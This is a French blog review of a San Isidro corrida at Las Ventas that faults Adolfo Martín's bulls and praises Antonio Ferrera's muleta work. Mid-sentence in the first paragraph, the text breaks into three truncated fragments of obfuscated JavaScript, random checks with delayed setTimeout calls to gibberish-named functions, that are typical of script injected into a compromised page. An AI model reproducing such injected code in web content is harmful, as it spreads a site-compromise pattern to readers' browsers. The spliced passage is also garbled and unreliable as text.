CORRIDA DÉCASTÉE D’ADOLFO, MAESTRIA DE FERRERA

San Isidro, 24ème corrida. Au cours de cette San Isidro les toros-toristes ont été vaincus par le toro brave… que l’on élève habituellement dans ceux qu’on appelle «élevages commerciaux ». A l’exception de la corrida de Rehuelga –les «santacolomas » n’ont jamais été considérés toristes- et deux exceptions pendant la corrida de Victorino, le reste valait mieux le destiner pour de la viandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande. Ceux d’Adolfo Martín ont été les pires : manquant race, longs de mauvaises idées, laids d’armures, ils ont eu peur des leurres et se sont défendus. Ils étaient intoréables.

Mais il y avait là Antonio Ferrera, qui a tout encaissé à son premier et a donné une leçon de tauromachie face à son second. Les arènes ont vibré lors de la seconde faena de muleta mais se sont écroulées parce qu’il a tué de trois bons pinchazos, une entière et deux descabellos. En d’autres temps, les arènes de Las Ventas l’auraient valorisé davantage.

Le reste du bétail fut horrible. Nous conviendrons que le second passait mais ne chargeait pas et logiquement Juan Bautista n’enflamma pas des arènes qui n’admettent que le toreo joli même s’il n’est pas bon. Manuel Escribano s’est montré bouillonnant et volontaires devant deux bêtes qui ne servaient à rien.

Deux questions. La première : pourquoi les arènes exigent de placer les toros si loin du cheval dès lors que manifestement, depuis leur sortie, on a bien compris leur qualité de mansos ? Les aficionados puristes sont d’une stupidité illimitée. Et la seconde : pourquoi les arènes de Madrid ne valorisent-elles pas l’exécution de l’estocade, méprisent la demie estocade et ne soucient que du placement du fer ? C’est parfois soûlant que d’être dans les « premières arènes du monde ».

 

Les commentaires sont fermés.